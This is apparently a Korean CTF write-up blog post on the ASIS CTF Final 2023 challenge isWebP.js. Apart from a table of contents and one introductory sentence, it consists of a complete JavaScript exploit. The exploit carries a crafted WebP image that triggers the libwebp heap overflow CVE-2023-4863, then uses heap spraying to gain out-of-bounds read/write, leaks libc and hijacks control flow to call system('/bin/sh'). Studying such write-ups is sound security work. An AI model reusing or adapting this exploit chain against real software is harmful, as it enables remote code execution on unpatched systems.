[CTF Write Up] ASIS CTF Final 2023 - isWebP.js : Exploiting QuickJS by Webp Vulnerability
2024. 1. 6. 04:01ㆍCTF write up
1. Overview
2. CVE-2023-4863
3. Patch Analysis
3-1. libwebp.patch
3-2. quickjs.patch
3-2-1. Disable System Module
3-2-2. Add isWebP Function
4. Exploiting QuickJS
4-1. VP8LHuffmanTablesAllocate Analysis
4-2. Make OOB Read / Write Primitive by Heap Spraying
4-3. Hijack RIP
5. Finish
Full Write Up
isWebP.js는 ASIS CTF Final 2023에 출제된 Pwnable 문제입니다. CVE-2023-4863 취약점의 영향을 버전의 libwebp 파일과 Webp 관련 기능이 추가된 QuickJS 바이너리가 주어집니다.
let webp0 = new Uint8Array([82, 73, 70, 70, 136, 2, 0, 0, 87, 69, 66, 80, 86, 80, 56, 76, 123, 2, 0, 0, 47, 0, 0, 0, 16, 26, 15, 130, 36, 9, 146, 36, 73, 18, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 68, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 102, 86, 207, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 238, 221, 157, 7, 65, 146, 4, 73, 146, 36, 9, 48, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 50, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 51, 179, 122, 118, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 119, 247, 206, 131, 32, 73, 130, 36, 73, 146, 4, 24, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 153, 89, 61, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 187, 123, 231, 65, 144, 36, 65, 146, 36, 73, 2, 140, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 136, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 204, 172, 158, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 221, 189, 243, 32, 72, 146, 32, 73, 146, 36, 185, 187, 187, 187, 187, 187, 187, 71, 68, 68, 68, 68, 68, 68, 68, 68, 86, 207, 222, 221, 1, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255, 255])
var spraying1 = new Array(0x500);
var spraying2 = new Array(0x500);
for(let i=0;i<0x500;i++){
spraying1[i] = new ArrayBuffer(0x2f28)
spraying2[i] = new Uint32Array(0x1)
}
for(let i=0x1;i<0x4ff;i++){
spraying1[i] = 0x0
}
for(let i=0x1;i<0x4ff;i++){
isWebP(webp0)
}
let oob_index = 0;
for(let i=0;i<0xfff;i++){
if(spraying2[i].length > 0x100){
oob_index = i
break
}
}
console.log("[+] OOB Index : " + oob_index)
OOBArray = spraying2[oob_index]
OOBArray[0] = 0xdead1337
console.log("[+] OOBArray.length : " + OOBArray.length)
let libc_base_lower = OOBArray[0x81e90/4] - 0x219ce0
let libc_base_higher = OOBArray[(0x81e90/4)+1]
console.log('[+] libc_base : 0x'+libc_base_higher.toString(16)+libc_base_lower.toString(16))
let binsh = [0xdeadbeef]
OOBArray[0x58/4] = OOBArray[0x58/4] - 0x121d48 - 0x2ebb8
OOBArray[0] = 0x6e69622f
OOBArray[1] = 0x68732f
OOBArray[0x2ebb8 / 4] = libc_base_lower + 0x50d70
OOBArray[(0x2ebb8 / 4) + 1] = libc_base_higher
isWebP(binsh)
console.log("pause")
while(true){} // pause